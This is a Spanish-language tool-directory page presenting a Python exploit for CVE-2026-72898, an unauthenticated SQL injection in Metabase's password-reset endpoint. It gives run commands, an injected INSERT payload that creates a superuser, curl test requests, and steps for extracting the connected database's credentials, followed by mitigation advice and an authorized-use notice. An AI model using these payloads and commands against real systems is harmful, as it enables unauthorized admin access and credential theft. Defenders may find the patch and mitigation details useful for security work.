Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-72898 — Exploit en Python para CVE-2026-72898, una inyección SQL no autenticada en el endpoint de restablecimiento de contraseña de Metabase que crea cuentas de administrador y extrae credenciales de la base de datos. | Kitploit
Herramientas/GitHubGitHub/34zy/cve-2026-72898
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónSeguridad WebPruebas de PenetraciónRed TeamingSeguridad de Bases de Datos
GitHub34zy/cve-2026-72898

CVE-2026-72898

Exploit en Python para CVE-2026-72898, una inyección SQL no autenticada en el endpoint de restablecimiento de contraseña de Metabase que crea cuentas de administrador y extrae credenciales de la base de datos.

hace 6h 14mAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Inyección SQL RCE en Metabase

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

Inyección SQL no autenticada en el endpoint /api/session/reset_password de Metabase. Crea cuentas de administrador y extrae credenciales de la base de datos.

Afectado: v58.0 - v63.3 | Parcheado: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


Inicio Rápido

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

La Vulnerabilidad

Concatenación de cadenas en la consulta SQL:

root@kitploit:~
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"

Payload de ataque:

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

Uso

Solo comprobación (sin modificación):

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

Explotación completa:

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

Pruebas manuales:

root@kitploit:~
# Verify endpoint
curl http://localhost:5000/api/health

# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

Qué Hace

  1. Detecta la instancia de Metabase (SQLi basada en booleanos)
  2. Crea un usuario administrador mediante inyección SQL
  3. Se autentica con el nuevo administrador
  4. Extrae las credenciales de la base de datos conectada
  5. Verifica el compromiso total del sistema

Impacto

  • Acceso de administrador no autenticado
  • Extracción de credenciales de la base de datos
  • Compromiso de la base de datos conectada
  • Control total de la aplicación

Mitigación

AHORA:

  • Actualizar a la versión parcheada
  • Bloquear /api/session/reset_password mediante WAF
  • Auditar las cuentas de administrador en busca de adiciones no autorizadas
  • Rotar todas las credenciales de la base de datos

DESPUÉS:

  • Usar consultas parametrizadas
  • Añadir validación de entrada
  • Implementar autenticación en todos los endpoints sensibles
  • Habilitar el registro de consultas SQL

Enlaces

  • GitHub Advisory
  • NVD CVE Entry

Solo para uso autorizado. El acceso no autorizado es ilegal.

Descargar herramienta